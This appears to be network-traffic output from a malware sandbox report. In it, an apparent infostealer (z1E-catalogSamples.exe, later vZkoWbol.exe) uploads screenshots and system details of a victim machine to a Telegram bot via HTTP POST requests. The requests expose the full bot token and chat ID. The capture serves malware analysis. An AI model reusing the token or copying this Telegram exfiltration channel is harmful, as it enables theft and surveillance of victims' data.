                                                                  {"ok":true,"result":{"message_id":3436,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548099,"document":{"file_name":"user-618321 2024-05-07 07-14-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1sZiKrQ-jztWjz1OxDzTwEJ1W0Si4AArAXAAKLUhlRb2ciH4LIkj8BAAdtAAM0BA","file_unique_id":"AQADsBcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1sZiKrQ-jztWjz1OxDzTwEJ1W0Si4AArAXAAKLUhlRb2ciH4LIkj8BAAdtAAM0BA","file_unique_id":"AQADsBcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINbGYiq0Po87Vo89TsQ808BCdVtEouAAKwFwACi1IZUW9nIh-CyJI_NAQ","file_unique_id":"AgADsBcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 05/07/2024 07:09:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.5 | 49721 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:35:07 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc71aad670e85b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:08 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 31 2f 32 30 32 34 20 31 31 3a 30 39 3a 33 33 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc71aad670e85bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc71aad670e85bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/11/2024 11:09:33User
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:08 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:08 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:08 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:08 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 31 61 61 64 36 37 30 65 38 35 62 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc71aad670e85b--
                                                                  2024-04-19 17:35:08 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:09 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:09 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3438,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548109,"document":{"file_name":"user-618321 2024-05-11 11-09-33.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1uZiKrTDFvh8_l5fEgKcZUi_MVXiUAArEXAAKLUhlRSljehnrr2_YBAAdtAAM0BA","file_unique_id":"AQADsRcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1uZiKrTDFvh8_l5fEgKcZUi_MVXiUAArEXAAKLUhlRSljehnrr2_YBAAdtAAM0BA","file_unique_id":"AQADsRcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINbmYiq0wxb4fP5eXxICnGVIvzFV4lAAKxFwACi1IZUUpY3oZ669v2NAQ","file_unique_id":"AgADsRcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/11/2024 11:09:33\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.5 | 49722 | 149.154.167.220 | 443 | 3472 | C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:35:10 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc74196518f1dd
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:11 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 34 2f 32 30 32 34 20 31 33 3a 32 35 3a 35 37 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc74196518f1ddContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc74196518f1ddContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/14/2024 13:25:57User
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:35:11 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:11 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:11 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:11 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 34 31 39 36 35 31 38 66 31 64 64 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc74196518f1dd--
                                                                  2024-04-19 17:35:11 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:12 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:12 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3439,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548112,"document":{"file_name":"user-618321 2024-05-14 13-25-59.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1vZiKrT5PtETgHv09Qiq16ih1NgUAAArIXAAKLUhlR0i3QAXUk-8oBAAdtAAM0BA","file_unique_id":"AQADshcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1vZiKrT5PtETgHv09Qiq16ih1NgUAAArIXAAKLUhlR0i3QAXUk-8oBAAdtAAM0BA","file_unique_id":"AQADshcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINb2Yiq0-T7RE4B79PUIqteoodTYFAAAKyFwACi1IZUdIt0AF1JPvKNAQ","file_unique_id":"AgADshcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/14/2024 13:25:57\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.5 | 49723 | 149.154.167.220 | 443 | 7324 | C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-04-19 17:35:17 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc6a4172022d82
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67155
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:35:17 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 61 34 31 37 32 30 32 32 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 61 34 31 37 32 30 32 32 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 32 2f 32 30 32 34 20 30 30 3a 34 32 3a 32 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc6a4172022d82Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6a4172022d82Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/02/2024 00:42:29User
                                                                  2024-04-19 17:35:17 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
